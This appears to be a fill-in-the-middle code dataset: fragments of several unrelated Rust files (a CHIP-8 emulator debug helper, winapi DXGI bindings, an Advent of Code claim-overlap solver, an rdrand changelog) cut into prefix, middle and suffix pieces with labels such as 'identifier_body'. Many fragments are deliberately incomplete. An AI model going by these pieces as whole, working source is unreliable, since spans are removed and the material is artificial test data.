if cpu.v[i] == 0 {
continue;
}
println!(" v{:.x}: {:.x}", i, cpu.v[i]);
}
println!(" pc: {:.x}", cpu.pc);
println!(" I: {:.x}", cpu.i);
println!(" sp: {:.x}", cpu.sp);
println!("opcode: {:.x}", opcode.code);
}
|
debug_cycle
|
identifier_name
|
util.rs
|
use cpu::Cpu;
use opcode::Opcode;
pub static mut DEBUG_MODE: bool = true;
pub static FONTSET: [u8; 80] = [
0xF0, 0x90, 0x90, 0x90, 0xF0, // 0
0x20, 0x60, 0x20, 0x20, 0x70, // 1
0xF0, 0x10, 0xF0, 0x80, 0xF0, // 2
0xF0, 0x10, 0xF0, 0x10, 0xF0, // 3
0x90, 0x90, 0xF0, 0x10, 0x10, // 4
0xF0, 0x80, 0xF0, 0x10, 0xF0, // 5
0xF0, 0x80, 0xF0, 0x90, 0xF0, // 6
0xF0, 0x10, 0x20, 0x40, 0x40, // 7
0xF0, 0x90, 0xF0, 0x90, 0xF0, // 8
0xF0, 0x90, 0xF0, 0x10, 0xF0, // 9
0xF0, 0x90, 0xF0, 0x90, 0x90, // A
0xE0, 0x90, 0xE0, 0x90, 0xE0, // B
0xF0, 0x80, 0x80, 0x80, 0xF0, // C
0xE0, 0x90, 0x90, 0x90, 0xE0, // D
0xF0, 0x80, 0xF0, 0x80, 0xF0, // E
0xF0, 0x80, 0xF0, 0x80, 0x80 // F
];
pub fn debug_cycle(cpu: &Cpu, opcode: &Opcode) {
unsafe {
if!DEBUG_MODE {
return;
}
}
println!("cpu:");
for i in 0..16 {
if cpu.v[i] == 0
|
println!(" v{:.x}: {:.x}", i, cpu.v[i]);
}
println!(" pc: {:.x}", cpu.pc);
println!(" I: {:.x}", cpu.i);
println!(" sp: {:.x}", cpu.sp);
println!("opcode: {:.x}", opcode.code);
}
|
{
continue;
}
|
conditional_block
|
util.rs
|
use cpu::Cpu;
use opcode::Opcode;
pub static mut DEBUG_MODE: bool = true;
pub static FONTSET: [u8; 80] = [
0xF0, 0x90, 0x90, 0x90, 0xF0, // 0
0x20, 0x60, 0x20, 0x20, 0x70, // 1
0xF0, 0x10, 0xF0, 0x80, 0xF0, // 2
0xF0, 0x10, 0xF0, 0x10, 0xF0, // 3
0x90, 0x90, 0xF0, 0x10, 0x10, // 4
0xF0, 0x80, 0xF0, 0x10, 0xF0, // 5
0xF0, 0x80, 0xF0, 0x90, 0xF0, // 6
0xF0, 0x10, 0x20, 0x40, 0x40, // 7
0xF0, 0x90, 0xF0, 0x90, 0xF0, // 8
0xF0, 0x90, 0xF0, 0x10, 0xF0, // 9
0xF0, 0x90, 0xF0, 0x90, 0x90, // A
0xE0, 0x90, 0xE0, 0x90, 0xE0, // B
0xF0, 0x80, 0x80, 0x80, 0xF0, // C
0xE0, 0x90, 0x90, 0x90, 0xE0, // D
0xF0, 0x80, 0xF0, 0x80, 0xF0, // E
0xF0, 0x80, 0xF0, 0x80, 0x80 // F
];
pub fn debug_cycle(cpu: &Cpu, opcode: &Opcode)
|
{
unsafe {
if !DEBUG_MODE {
return;
}
}
println!("cpu:");
for i in 0..16 {
if cpu.v[i] == 0 {
continue;
}
println!(" v{:.x}: {:.x}", i, cpu.v[i]);
}
println!(" pc: {:.x}", cpu.pc);
println!(" I: {:.x}", cpu.i);
println!(" sp: {:.x}", cpu.sp);
println!("opcode: {:.x}", opcode.code);
}
|
identifier_body
|
|
util.rs
|
use cpu::Cpu;
use opcode::Opcode;
pub static mut DEBUG_MODE: bool = true;
|
pub static FONTSET: [u8; 80] = [
0xF0, 0x90, 0x90, 0x90, 0xF0, // 0
0x20, 0x60, 0x20, 0x20, 0x70, // 1
0xF0, 0x10, 0xF0, 0x80, 0xF0, // 2
0xF0, 0x10, 0xF0, 0x10, 0xF0, // 3
0x90, 0x90, 0xF0, 0x10, 0x10, // 4
0xF0, 0x80, 0xF0, 0x10, 0xF0, // 5
0xF0, 0x80, 0xF0, 0x90, 0xF0, // 6
0xF0, 0x10, 0x20, 0x40, 0x40, // 7
0xF0, 0x90, 0xF0, 0x90, 0xF0, // 8
0xF0, 0x90, 0xF0, 0x10, 0xF0, // 9
0xF0, 0x90, 0xF0, 0x90, 0x90, // A
0xE0, 0x90, 0xE0, 0x90, 0xE0, // B
0xF0, 0x80, 0x80, 0x80, 0xF0, // C
0xE0, 0x90, 0x90, 0x90, 0xE0, // D
0xF0, 0x80, 0xF0, 0x80, 0xF0, // E
0xF0, 0x80, 0xF0, 0x80, 0x80 // F
];
/// Prints a one-cycle debug dump to stdout: every non-zero V register,
/// the program counter, index register, stack pointer, and the opcode
/// just executed. Does nothing when `DEBUG_MODE` is false.
pub fn debug_cycle(cpu: &Cpu, opcode: &Opcode) {
    // SAFETY: reads the `static mut DEBUG_MODE` flag. Sound only if nothing
    // mutates it concurrently — assumes a single-threaded emulator loop,
    // TODO confirm.
    unsafe {
        if!DEBUG_MODE {
            return;
        }
    }
    println!("cpu:");
    for i in 0..16 {
        // Skip zeroed registers to keep the dump compact.
        if cpu.v[i] == 0 {
            continue;
        }
        println!(" v{:.x}: {:.x}", i, cpu.v[i]);
    }
    println!(" pc: {:.x}", cpu.pc);
    println!(" I: {:.x}", cpu.i);
    println!(" sp: {:.x}", cpu.sp);
    println!("opcode: {:.x}", opcode.code);
}
|
random_line_split
|
|
dxgi.rs
|
// Copyright © 2015-2017 winapi-rs developers
// Licensed under the Apache License, Version 2.0
// <LICENSE-APACHE or http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your option.
// All files in the project carrying such notice may not be copied, modified, or distributed
// except according to those terms.
//! Mappings for the contents of dxgi.h
use ctypes::c_void;
use shared::basetsd::{SIZE_T, UINT64};
use shared::dxgiformat::DXGI_FORMAT;
use shared::dxgitype::{
DXGI_GAMMA_CONTROL, DXGI_GAMMA_CONTROL_CAPABILITIES, DXGI_MODE_DESC, DXGI_MODE_ROTATION,
DXGI_SAMPLE_DESC, DXGI_USAGE,
};
use shared::guiddef::{REFGUID, REFIID};
use shared::minwindef::{BOOL, BYTE, DWORD, FLOAT, HMODULE, UINT};
use shared::windef::{HDC, HMONITOR, HWND, RECT};
use um::unknwnbase::{IUnknown, IUnknownVtbl};
use um::winnt::{HANDLE, HRESULT, INT, LARGE_INTEGER, LUID, WCHAR};
STRUCT!{struct DXGI_FRAME_STATISTICS {
PresentCount: UINT,
PresentRefreshCount: UINT,
SyncRefreshCount: UINT,
SyncQPCTime: LARGE_INTEGER,
SyncGPUTime: LARGE_INTEGER,
}}
STRUCT!{struct DXGI_MAPPED_RECT {
Pitch: INT,
pBits: *mut BYTE,
}}
STRUCT!{struct DXGI_ADAPTER_DESC {
    Description: [WCHAR; 128],
    // NOTE(review): the Windows SDK dxgi.h names this field `VendorId`
    // (compare DXGI_ADAPTER_DESC1 below); `VectorId` looks like a typo.
    // Renaming it would break existing callers of this binding, so it is
    // only flagged here — confirm against upstream winapi before changing.
    VectorId: UINT,
    DeviceId: UINT,
    SubSysId: UINT,
    Revision: UINT,
    DedicatedVideoMemory: SIZE_T,
    DedicatedSystemMemory: SIZE_T,
    SharedSystemMemory: SIZE_T,
    AdapterLuid: LUID,
}}
STRUCT!{struct DXGI_OUTPUT_DESC {
DeviceName: [WCHAR; 32],
DesktopCoordinates: RECT,
AttachedToDesktop: BOOL,
Rotation: DXGI_MODE_ROTATION,
Monitor: HMONITOR,
}}
STRUCT!{struct DXGI_SHARED_RESOURCE {
Handle: HANDLE,
}}
pub const DXGI_RESOURCE_PRIORITY_MINIMUM: DWORD = 0x28000000;
pub const DXGI_RESOURCE_PRIORITY_LOW: DWORD = 0x50000000;
pub const DXGI_RESOURCE_PRIORITY_NORMAL: DWORD = 0x78000000;
pub const DXGI_RESOURCE_PRIORITY_HIGH: DWORD = 0xa0000000;
pub const DXGI_RESOURCE_PRIORITY_MAXIMUM: DWORD = 0xc8000000;
ENUM!{enum DXGI_RESIDENCY {
DXGI_RESIDENCY_FULLY_RESIDENT = 1,
DXGI_RESIDENCY_RESIDENT_IN_SHARED_MEMORY = 2,
DXGI_RESIDENCY_EVICTED_TO_DISK = 3,
}}
STRUCT!{struct DXGI_SURFACE_DESC {
Width: UINT,
Height: UINT,
Format: DXGI_FORMAT,
SampleDesc: DXGI_SAMPLE_DESC,
}}
ENUM!{enum DXGI_SWAP_EFFECT {
DXGI_SWAP_EFFECT_DISCARD = 0,
DXGI_SWAP_EFFECT_SEQUENTIAL = 1,
DXGI_SWAP_EFFECT_FLIP_SEQUENTIAL = 3,
DXGI_SWAP_EFFECT_FLIP_DISCARD = 4,
}}
ENUM!{enum DXGI_SWAP_CHAIN_FLAG {
DXGI_SWAP_CHAIN_FLAG_NONPREROTATED = 1,
DXGI_SWAP_CHAIN_FLAG_ALLOW_MODE_SWITCH = 2,
DXGI_SWAP_CHAIN_FLAG_GDI_COMPATIBLE = 4,
DXGI_SWAP_CHAIN_FLAG_RESTRICTED_CONTENT = 8,
DXGI_SWAP_CHAIN_FLAG_RESTRICT_SHARED_RESOURCE_DRIVER = 16,
DXGI_SWAP_CHAIN_FLAG_DISPLAY_ONLY = 32,
DXGI_SWAP_CHAIN_FLAG_FRAME_LATENCY_WAITABLE_OBJECT = 64,
DXGI_SWAP_CHAIN_FLAG_FOREGROUND_LAYER = 128,
DXGI_SWAP_CHAIN_FLAG_FULLSCREEN_VIDEO = 256,
DXGI_SWAP_CHAIN_FLAG_YUV_VIDEO = 512,
}}
STRUCT!{struct DXGI_SWAP_CHAIN_DESC {
BufferDesc: DXGI_MODE_DESC,
SampleDesc: DXGI_SAMPLE_DESC,
BufferUsage: DXGI_USAGE,
BufferCount: UINT,
OutputWindow: HWND,
Windowed: BOOL,
SwapEffect: DXGI_SWAP_EFFECT,
Flags: UINT,
}}
RIDL!(#[uuid(0xaec22fb8, 0x76f3, 0x4639, 0x9b, 0xe0, 0x28, 0xeb, 0x43, 0xa6, 0x7a, 0x2e)]
interface IDXGIObject(IDXGIObjectVtbl): IUnknown(IUnknownVtbl) {
fn SetPrivateData(
Name: REFGUID,
DataSize: UINT,
pData: *const c_void,
) -> HRESULT,
fn SetPrivateDataInterface(
Name: REFGUID,
pUnknown: *const IUnknown,
) -> HRESULT,
fn GetPrivateData(
Name: REFGUID,
pDataSize: *mut UINT,
pData: *mut c_void,
) -> HRESULT,
fn GetParent(
riid: REFIID,
ppParent: *mut *mut c_void,
) -> HRESULT,
});
RIDL!(#[uuid(0x3d3e0379, 0xf9de, 0x4d58, 0xbb, 0x6c, 0x18, 0xd6, 0x29, 0x92, 0xf1, 0xa6)]
interface IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn GetDevice(
riid: REFIID,
ppDevice: *mut *mut c_void,
) -> HRESULT,
});
RIDL!(#[uuid(0x035f3ab4, 0x482e, 0x4e50, 0xb4, 0x1f, 0x8a, 0x7f, 0x8b, 0xd8, 0x96, 0x0b)]
interface IDXGIResource(IDXGIResourceVtbl): IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl) {
fn GetSharedHandle(
pSharedHandle: *mut HANDLE,
) -> HRESULT,
fn GetUsage(
pUsage: *mut DXGI_USAGE,
) -> HRESULT,
fn SetEvictionPriority(
EvictionPriority: UINT,
) -> HRESULT,
fn GetEvictionPriority(
pEvictionPriority: *mut UINT,
) -> HRESULT,
});
RIDL!(#[uuid(0x9d8e1289, 0xd7b3, 0x465f, 0x81, 0x26, 0x25, 0x0e, 0x34, 0x9a, 0xf8, 0x5d)]
interface IDXGIKeyedMutex(IDXGIKeyedMutexVtbl): IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl) {
fn AcquireSync(
Key: UINT64,
dwMilliseconds: DWORD,
) -> HRESULT,
fn ReleaseSync(
Key: UINT64,
) -> HRESULT,
});
RIDL!(#[uuid(0xcafcb56c, 0x6ac3, 0x4889, 0xbf, 0x47, 0x9e, 0x23, 0xbb, 0xd2, 0x60, 0xec)]
interface IDXGISurface(IDXGISurfaceVtbl): IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl) {
fn GetDesc(
pDesc: *mut DXGI_SURFACE_DESC,
) -> HRESULT,
fn Map(
pLockedRect: *mut DXGI_MAPPED_RECT,
MapFlags: UINT,
) -> HRESULT,
fn Unmap() -> HRESULT,
});
RIDL!(#[uuid(0x4ae63092, 0x6327, 0x4c1b, 0x80, 0xae, 0xbf, 0xe1, 0x2e, 0xa3, 0x2b, 0x86)]
interface IDXGISurface1(IDXGISurface1Vtbl): IDXGISurface(IDXGISurfaceVtbl) {
fn GetDC(
Discard: BOOL,
phdc: *mut HDC,
) -> HRESULT,
fn ReleaseDC(
pDirtyRect: *mut RECT,
) -> HRESULT,
});
RIDL!(#[uuid(0x2411e7e1, 0x12ac, 0x4ccf, 0xbd, 0x14, 0x97, 0x98, 0xe8, 0x53, 0x4d, 0xc0)]
interface IDXGIAdapter(IDXGIAdapterVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn EnumOutputs(
Output: UINT,
ppOutput: *mut *mut IDXGIOutput,
) -> HRESULT,
fn GetDesc(
pDesc: *mut DXGI_ADAPTER_DESC,
) -> HRESULT,
fn CheckInterfaceSupport(
InterfaceName: REFGUID,
pUMDVersion: *mut LARGE_INTEGER,
) -> HRESULT,
});
RIDL!(#[uuid(0xae02eedb, 0xc735, 0x4690, 0x8d, 0x52, 0x5a, 0x8d, 0xc2, 0x02, 0x13, 0xaa)]
interface IDXGIOutput(IDXGIOutputVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn GetDesc(
pDesc: *mut DXGI_OUTPUT_DESC,
) -> HRESULT,
fn GetDisplayModeList(
EnumFormat: DXGI_FORMAT,
Flags: UINT,
pNumModes: *mut UINT,
pDesc: *mut DXGI_MODE_DESC,
) -> HRESULT,
fn FindClosestMatchingMode(
pModeToMatch: *const DXGI_MODE_DESC,
pClosestMatch: *mut DXGI_MODE_DESC,
pConcernedDevice: *mut IUnknown,
) -> HRESULT,
fn WaitForVBlank() -> HRESULT,
fn TakeOwnership(
pDevice: *mut IUnknown,
Exclusive: BOOL,
) -> HRESULT,
fn ReleaseOwnership() -> (),
fn GetGammaControlCapabilities(
pGammaCaps: *mut DXGI_GAMMA_CONTROL_CAPABILITIES,
) -> HRESULT,
fn SetGammaControl(
pArray: *const DXGI_GAMMA_CONTROL,
) -> HRESULT,
fn GetGammaControl(
pArray: *mut DXGI_GAMMA_CONTROL,
) -> HRESULT,
fn SetDisplaySurface(
pScanoutSurface: *mut IDXGISurface,
) -> HRESULT,
fn GetDisplaySurfaceData(
pDestination: *mut IDXGISurface,
) -> HRESULT,
fn GetFrameStatistics(
pStats: *mut DXGI_FRAME_STATISTICS,
) -> HRESULT,
});
pub const DXGI_MAX_SWAP_CHAIN_BUFFERS: DWORD = 16;
pub const DXGI_PRESENT_TEST: DWORD = 0x00000001;
pub const DXGI_PRESENT_DO_NOT_SEQUENCE: DWORD = 0x00000002;
pub const DXGI_PRESENT_RESTART: DWORD = 0x00000004;
pub const DXGI_PRESENT_DO_NOT_WAIT: DWORD = 0x00000008;
pub const DXGI_PRESENT_STEREO_PREFER_RIGHT: DWORD = 0x00000010;
pub const DXGI_PRESENT_STEREO_TEMPORARY_MONO: DWORD = 0x00000020;
pub const DXGI_PRESENT_RESTRICT_TO_OUTPUT: DWORD = 0x00000040;
pub const DXGI_PRESENT_USE_DURATION: DWORD = 0x00000100;
RIDL!(#[uuid(0x310d36a0, 0xd2e7, 0x4c0a, 0xaa, 0x04, 0x6a, 0x9d, 0x23, 0xb8, 0x88, 0x6a)]
interface IDXGISwapChain(IDXGISwapChainVtbl): IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl) {
fn Present(
SyncInterval: UINT,
Flags: UINT,
) -> HRESULT,
fn GetBuffer(
Buffer: UINT,
riid: REFIID,
ppSurface: *mut *mut c_void,
) -> HRESULT,
fn SetFullscreenState(
Fullscreen: BOOL,
|
ppTarget: *mut *mut IDXGIOutput,
) -> HRESULT,
fn GetDesc(
pDesc: *mut DXGI_SWAP_CHAIN_DESC,
) -> HRESULT,
fn ResizeBuffers(
BufferCount: UINT,
Width: UINT,
Height: UINT,
NewFormat: DXGI_FORMAT,
SwapChainFlags: UINT,
) -> HRESULT,
fn ResizeTarget(
pNewTargetParameters: *const DXGI_MODE_DESC,
) -> HRESULT,
fn GetContainingOutput(
ppOutput: *mut *mut IDXGIOutput,
) -> HRESULT,
fn GetFrameStatistics(
pStats: *mut DXGI_FRAME_STATISTICS,
) -> HRESULT,
fn GetLastPresentCount(
pLastPresentCount: *mut UINT,
) -> HRESULT,
});
RIDL!(#[uuid(0x7b7166ec, 0x21c7, 0x44ae, 0xb2, 0x1a, 0xc9, 0xae, 0x32, 0x1a, 0xe3, 0x69)]
interface IDXGIFactory(IDXGIFactoryVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn EnumAdapters(
Adapter: UINT,
ppAdapter: *mut *mut IDXGIAdapter,
) -> HRESULT,
fn MakeWindowAssociation(
WindowHandle: HWND,
Flags: UINT,
) -> HRESULT,
fn GetWindowAssociation(
pWindowHandle: *mut HWND,
) -> HRESULT,
fn CreateSwapChain(
pDevice: *mut IUnknown,
pDesc: *mut DXGI_SWAP_CHAIN_DESC,
ppSwapChain: *mut *mut IDXGISwapChain,
) -> HRESULT,
fn CreateSoftwareAdapter(
Module: HMODULE,
ppAdapter: *mut *mut IDXGIAdapter,
) -> HRESULT,
});
RIDL!(#[uuid(0x54ec77fa, 0x1377, 0x44e6, 0x8c, 0x32, 0x88, 0xfd, 0x5f, 0x44, 0xc8, 0x4c)]
interface IDXGIDevice(IDXGIDeviceVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn GetAdapter(
pAdapter: *mut *mut IDXGIAdapter,
) -> HRESULT,
fn CreateSurface(
pDesc: *const DXGI_SURFACE_DESC,
NumSurfaces: UINT,
Usage: DXGI_USAGE,
pSharedResource: *const DXGI_SHARED_RESOURCE,
ppSurface: *mut *mut IDXGISurface,
) -> HRESULT,
fn QueryResourceResidency(
ppResources: *const *mut IUnknown,
pResidencyStatus: *mut DXGI_RESIDENCY,
NumResources: UINT,
) -> HRESULT,
fn SetGPUThreadPriority(
Priority: INT,
) -> HRESULT,
fn GetGPUThreadPriority(
pPriority: *mut INT,
) -> HRESULT,
});
ENUM!{enum DXGI_ADAPTER_FLAG {
DXGI_ADAPTER_FLAG_NONE,
DXGI_ADAPTER_FLAG_REMOTE,
DXGI_ADAPTER_FLAG_SOFTWARE,
}}
STRUCT!{struct DXGI_ADAPTER_DESC1 {
Description: [WCHAR; 128],
VendorId: UINT,
DeviceId: UINT,
SubSysId: UINT,
Revision: UINT,
DedicatedVideoMemory: SIZE_T,
DedicatedSystemMemory: SIZE_T,
SharedSystemMemory: SIZE_T,
AdapterLuid: LUID,
Flags: UINT,
}}
STRUCT!{struct DXGI_DISPLAY_COLOR_SPACE {
PrimaryCoordinates: [[FLOAT; 2]; 8],
WhitePoints: [[FLOAT; 2]; 16],
}}
RIDL!(#[uuid(0x770aae78, 0xf26f, 0x4dba, 0xa8, 0x29, 0x25, 0x3c, 0x83, 0xd1, 0xb3, 0x87)]
interface IDXGIFactory1(IDXGIFactory1Vtbl): IDXGIFactory(IDXGIFactoryVtbl) {
fn EnumAdapters1(
Adapter: UINT,
ppAdapter: *mut *mut IDXGIAdapter1,
) -> HRESULT,
fn IsCurrent() -> BOOL,
});
RIDL!(#[uuid(0x29038f61, 0x3839, 0x4626, 0x91, 0xfd, 0x08, 0x68, 0x79, 0x01, 0x1a, 0x05)]
interface IDXGIAdapter1(IDXGIAdapter1Vtbl): IDXGIAdapter(IDXGIAdapterVtbl) {
fn GetDesc1(
pDesc: *mut DXGI_ADAPTER_DESC1,
) -> HRESULT,
});
RIDL!(#[uuid(0x77db970f, 0x6276, 0x48ba, 0xba, 0x28, 0x07, 0x01, 0x43, 0xb4, 0x39, 0x2c)]
interface IDXGIDevice1(IDXGIDevice1Vtbl): IDXGIDevice(IDXGIDeviceVtbl) {
fn SetMaximumFrameLatency(
MaxLatency: UINT,
) -> HRESULT,
fn GetMaximumFrameLatency(
pMaxLatency: *mut UINT,
) -> HRESULT,
});
|
pTarget: *mut IDXGIOutput,
) -> HRESULT,
fn GetFullscreenState(
pFullscreen: *mut BOOL,
|
random_line_split
|
03.rs
|
#[macro_use]
extern crate lazy_static;
extern crate itertools;
extern crate regex;
use itertools::Itertools;
use regex::Regex;
#[derive(Clone)]
struct Claim {
id: i32,
offset_left: i32,
offset_top: i32,
width: i32,
height: i32,
}
impl Claim {
fn parse(raw_claim: &str) -> Claim {
lazy_static! {
static ref CLAIM_REGEX: Regex =
Regex::new(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$").unwrap();
}
let captures = CLAIM_REGEX.captures(raw_claim).unwrap();
Claim {
id: captures.get(1).unwrap().as_str().parse::<i32>().unwrap(),
offset_left: captures.get(2).unwrap().as_str().parse::<i32>().unwrap(),
offset_top: captures.get(3).unwrap().as_str().parse::<i32>().unwrap(),
width: captures.get(4).unwrap().as_str().parse::<i32>().unwrap(),
height: captures.get(5).unwrap().as_str().parse::<i32>().unwrap(),
}
}
fn coordinates(self) -> Vec<(i32, i32)> {
let mut coords = Vec::new();
for x in 0..self.width {
for y in 0..self.height {
coords.push((x + self.offset_left, y + self.offset_top));
}
}
coords
}
}
fn overlapping_inches(input: String) -> i32 {
let mut claims: Vec<Claim> = Vec::new();
for raw_claim in input.split("\n") {
claims.push(Claim::parse(raw_claim));
}
let coords = claims.into_iter().flat_map(|x| x.coordinates()).sorted();
let mut prev = (-1, -1);
let mut checked = false;
let mut overlaps = 0;
for c in coords {
if prev == c &&!checked {
|
} else if prev!= c {
checked = false;
}
prev = c;
}
overlaps
}
fn main() {
let input = include_str!("input.txt").into();
println!("{}", overlapping_inches(input));
}
#[test]
fn test_03() {
let input = vec!["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"];
let result = overlapping_inches(input.join("\n"));
assert_eq!(result, 4);
}
|
overlaps += 1;
checked = true;
|
random_line_split
|
03.rs
|
#[macro_use]
extern crate lazy_static;
extern crate itertools;
extern crate regex;
use itertools::Itertools;
use regex::Regex;
/// One fabric claim from the puzzle input: a `width` x `height` rectangle
/// whose top-left corner sits `offset_left` inches from the left edge and
/// `offset_top` inches from the top edge of the fabric.
#[derive(Clone)]
struct Claim {
    id: i32,          // claim id (the number after '#')
    offset_left: i32, // inches between the left fabric edge and the rectangle
    offset_top: i32,  // inches between the top fabric edge and the rectangle
    width: i32,       // rectangle width in inches
    height: i32,      // rectangle height in inches
}
impl Claim {
    /// Parses one claim line of the form `#id @ left,top: widthxheight`
    /// (e.g. `#1 @ 1,3: 4x4`).
    ///
    /// Panics if the line does not match that format or a field fails to
    /// parse — acceptable for trusted puzzle input.
    fn parse(raw_claim: &str) -> Claim {
        // Compiled once and cached across calls via lazy_static.
        lazy_static! {
            static ref CLAIM_REGEX: Regex =
                Regex::new(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$").unwrap();
        }
        let captures = CLAIM_REGEX.captures(raw_claim).unwrap();
        Claim {
            id: captures.get(1).unwrap().as_str().parse::<i32>().unwrap(),
            offset_left: captures.get(2).unwrap().as_str().parse::<i32>().unwrap(),
            offset_top: captures.get(3).unwrap().as_str().parse::<i32>().unwrap(),
            width: captures.get(4).unwrap().as_str().parse::<i32>().unwrap(),
            height: captures.get(5).unwrap().as_str().parse::<i32>().unwrap(),
        }
    }
    /// Returns every absolute (x, y) square inch covered by this claim;
    /// consumes the claim. The result has `width * height` entries.
    fn coordinates(self) -> Vec<(i32, i32)> {
        let mut coords = Vec::new();
        for x in 0..self.width {
            for y in 0..self.height {
                coords.push((x + self.offset_left, y + self.offset_top));
            }
        }
        coords
    }
}
/// Counts the square inches of fabric covered by two or more claims.
///
/// Parses one claim per line, expands every claim into the coordinates it
/// covers, sorts them so duplicates become adjacent, and counts each
/// coordinate at most once no matter how many claims overlap there.
fn overlapping_inches(input: String) -> i32 {
    let mut claims: Vec<Claim> = Vec::new();
    for raw_claim in input.split('\n') {
        // Skip blank lines (e.g. a trailing newline when the input was read
        // from a file); previously these panicked inside `Claim::parse`.
        if raw_claim.trim().is_empty() {
            continue;
        }
        claims.push(Claim::parse(raw_claim));
    }
    let coords = claims.into_iter().flat_map(|x| x.coordinates()).sorted();
    let mut prev = (-1, -1);
    // `checked` is true once the coordinate currently in `prev` has already
    // been counted, so a coordinate covered by 3+ claims still counts once.
    let mut checked = false;
    let mut overlaps = 0;
    for c in coords {
        if prev == c && !checked {
            overlaps += 1;
            checked = true;
        } else if prev != c {
            checked = false;
        }
        prev = c;
    }
    overlaps
}
/// Reads the puzzle input embedded at compile time and prints the number of
/// overlapping square inches.
fn main() {
    let input = include_str!("input.txt").into();
    println!("{}", overlapping_inches(input));
}
#[test]
fn test_03()
|
{
let input = vec!["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"];
let result = overlapping_inches(input.join("\n"));
assert_eq!(result, 4);
}
|
identifier_body
|
|
03.rs
|
#[macro_use]
extern crate lazy_static;
extern crate itertools;
extern crate regex;
use itertools::Itertools;
use regex::Regex;
#[derive(Clone)]
struct Claim {
id: i32,
offset_left: i32,
offset_top: i32,
width: i32,
height: i32,
}
impl Claim {
fn parse(raw_claim: &str) -> Claim {
lazy_static! {
static ref CLAIM_REGEX: Regex =
Regex::new(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$").unwrap();
}
let captures = CLAIM_REGEX.captures(raw_claim).unwrap();
Claim {
id: captures.get(1).unwrap().as_str().parse::<i32>().unwrap(),
offset_left: captures.get(2).unwrap().as_str().parse::<i32>().unwrap(),
offset_top: captures.get(3).unwrap().as_str().parse::<i32>().unwrap(),
width: captures.get(4).unwrap().as_str().parse::<i32>().unwrap(),
height: captures.get(5).unwrap().as_str().parse::<i32>().unwrap(),
}
}
fn coordinates(self) -> Vec<(i32, i32)> {
let mut coords = Vec::new();
for x in 0..self.width {
for y in 0..self.height {
coords.push((x + self.offset_left, y + self.offset_top));
}
}
coords
}
}
fn overlapping_inches(input: String) -> i32 {
let mut claims: Vec<Claim> = Vec::new();
for raw_claim in input.split("\n") {
claims.push(Claim::parse(raw_claim));
}
let coords = claims.into_iter().flat_map(|x| x.coordinates()).sorted();
let mut prev = (-1, -1);
let mut checked = false;
let mut overlaps = 0;
for c in coords {
if prev == c &&!checked
|
else if prev!= c {
checked = false;
}
prev = c;
}
overlaps
}
fn main() {
let input = include_str!("input.txt").into();
println!("{}", overlapping_inches(input));
}
#[test]
fn test_03() {
let input = vec!["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"];
let result = overlapping_inches(input.join("\n"));
assert_eq!(result, 4);
}
|
{
overlaps += 1;
checked = true;
}
|
conditional_block
|
03.rs
|
#[macro_use]
extern crate lazy_static;
extern crate itertools;
extern crate regex;
use itertools::Itertools;
use regex::Regex;
#[derive(Clone)]
struct
|
{
id: i32,
offset_left: i32,
offset_top: i32,
width: i32,
height: i32,
}
impl Claim {
fn parse(raw_claim: &str) -> Claim {
lazy_static! {
static ref CLAIM_REGEX: Regex =
Regex::new(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$").unwrap();
}
let captures = CLAIM_REGEX.captures(raw_claim).unwrap();
Claim {
id: captures.get(1).unwrap().as_str().parse::<i32>().unwrap(),
offset_left: captures.get(2).unwrap().as_str().parse::<i32>().unwrap(),
offset_top: captures.get(3).unwrap().as_str().parse::<i32>().unwrap(),
width: captures.get(4).unwrap().as_str().parse::<i32>().unwrap(),
height: captures.get(5).unwrap().as_str().parse::<i32>().unwrap(),
}
}
fn coordinates(self) -> Vec<(i32, i32)> {
let mut coords = Vec::new();
for x in 0..self.width {
for y in 0..self.height {
coords.push((x + self.offset_left, y + self.offset_top));
}
}
coords
}
}
fn overlapping_inches(input: String) -> i32 {
let mut claims: Vec<Claim> = Vec::new();
for raw_claim in input.split("\n") {
claims.push(Claim::parse(raw_claim));
}
let coords = claims.into_iter().flat_map(|x| x.coordinates()).sorted();
let mut prev = (-1, -1);
let mut checked = false;
let mut overlaps = 0;
for c in coords {
if prev == c &&!checked {
overlaps += 1;
checked = true;
} else if prev!= c {
checked = false;
}
prev = c;
}
overlaps
}
fn main() {
let input = include_str!("input.txt").into();
println!("{}", overlapping_inches(input));
}
#[test]
fn test_03() {
let input = vec!["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"];
let result = overlapping_inches(input.join("\n"));
assert_eq!(result, 4);
}
|
Claim
|
identifier_name
|
changelog.rs
|
//! Project changelog
/// ## Breaking changes
///
/// Upgrade to `rand_core = ^0.5.1`. This involves a major change to how errors are handled. See
/// [`ErrorCode`](crate::ErrorCode).
///
/// rustc version 1.42 is now required to build the library (up from 1.32).
pub mod r0_7_0 {}
/// Fix unsound mutable reference aliasing in the implementation of `try_fill_bytes`.
///
/// The affected code has been replaced with safer one where the scope of `unsafe` is reduced to
/// the loop which obtains a random word via a native instruction.
///
/// ## Breaking changes
///
/// rustc version 1.32 is now required to build the library (up from 1.30).
pub mod r0_6_0 {}
|
/// Updated rand_core dependency from `0.3` to `0.4`.
pub mod r0_5_0 {}
/// ## Breaking changes
///
/// Crate gained an enabled-by-default `std` feature. If you relied on rdrand being `core`-able
/// change your dependency to appear as such:
///
/// ```toml
/// rdrand = { version = "0.4", default-features = false }
/// ```
///
/// This is done so that an advantage of the common feature detection functionality could be
/// employed by users that are not constrained by `core`. This functionality is faster, caches the
